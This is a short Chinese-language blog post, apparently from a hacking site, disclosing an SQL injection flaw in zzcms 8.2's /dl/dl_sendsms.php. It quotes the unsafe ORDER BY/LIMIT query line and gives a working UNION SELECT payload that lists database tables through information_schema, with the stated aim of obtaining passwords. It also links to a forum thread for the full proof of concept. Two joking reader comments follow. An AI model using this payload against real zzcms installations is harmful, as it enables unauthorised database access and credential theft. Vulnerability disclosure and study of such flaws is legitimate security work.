zzcms 8.2最新sql注入漏洞

  • 内容
  • 相关

文件地址:

/dl/dl_sendsms.php

1.png

$sql2=$sql." order by id asc limit $n,$size";

可以通过SQL注入获取密码

2.png

3.png

构建

4.png


sql=select email from zzcms_dl where id=-1 union select group_concat(distinct table_name) from information_schema.columns where table_schema=database()#

poc利用

6.png


POC地址

http://bbs.0dayhack.com/thread-9-1-1.html

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:zzcms 8.2最新sql注入漏洞 - https://www.0dayhack.com/post-838.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

2条评论
  1. avatar

    尛熙24 Lv.1 Firefox 42.0 Firefox 42.0 Windows 7 Windows 7 回复

    杀毒v

    表情 骚年,我怀疑你写了一篇假的文章!
    表情 写得好好哟,我要给你生猴子!

    陕西省西安市 电信

    1. avatar

      godrgodr Lv.1 Chrome 57.0.2987.108 Chrome 57.0.2987.108 Android 5.1 Android 5.1 回复

      666,好想学,可惜我还是高中生,没时间

      江苏省 移动